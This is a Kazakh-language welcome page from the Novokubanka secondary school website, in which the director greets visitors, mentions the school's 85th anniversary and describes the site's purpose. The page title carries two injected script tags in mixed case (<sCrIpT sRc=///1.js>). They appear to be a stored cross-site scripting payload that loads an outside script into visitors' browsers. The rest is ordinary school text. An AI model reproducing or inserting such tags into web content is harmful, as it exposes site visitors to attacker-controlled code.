Құрметті оқушылар, ата-аналар, ұстаздар және сайт қонақтары !<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

11.02.2020

  Құрметті оқушылар, ата-аналар, ұстаздар және    сайт қонақтары !

Новокубанка орта мектеп сайтына қош келдіңіздер!

  Біздің мектептің 85 жылдық мерейтойымен тұспа- тұс келіп тұр. Біздің сайтымыз арқылы мектебіміздің ішкі  өмірі,тыныс-тіршілігі,  жаңа заманға сай , бәсекеге қабілетті түлектер тәрбиелеу барысындағы мектеп ұжымының жемісті еңбегі мен оқушылардың  жетістіктері, шыққан шыңдары, алар белестері туралы мағлұмат алып отырасыздар .Сайт - мектеп өмірінің айнасы. 

 Бұл сайттың басты мақсаты - білім мен тәрбие үрдісіндегі мектеп- оқушы- ата-ана байланысын нығайту, өзара тиімді әрекеттесу мүмкіндіктерін ашу, Тек қана ұстаздар емес, оқушылар мен ата-аналар да фотосуреттер, түрлі әңгімелер, өлең шумақтарын, ақылды кеңестерін сайт беттеріне жариялай алады. Біздің мұғалімдер жұмысының нәтижесі - халықаралық, аудандық, облыстық сайыстарда, спорттық жарыстарда бірнеше рет лауреат, жүлдегер атанған балалардың жетістіктері,  жобалы ғылыми іске қатысуы.

   Жылдан жылға біз дәстүрімізді сақтаймыз және жаңаларын қалыптастырамыз, өйткені мектеп – бұл үнемі жаңарып отыратын ағза, жүйе, оған ата-аналар өз балаларын сеніп тапсырады, ал ата-аналардың көбі - біздің түлектер.

 Мектеп директоры: Кулекина Баян Алшиновна

                                                 

Просмотров: 665


Пікір қосу



Деректерді қолтаңбаға қосу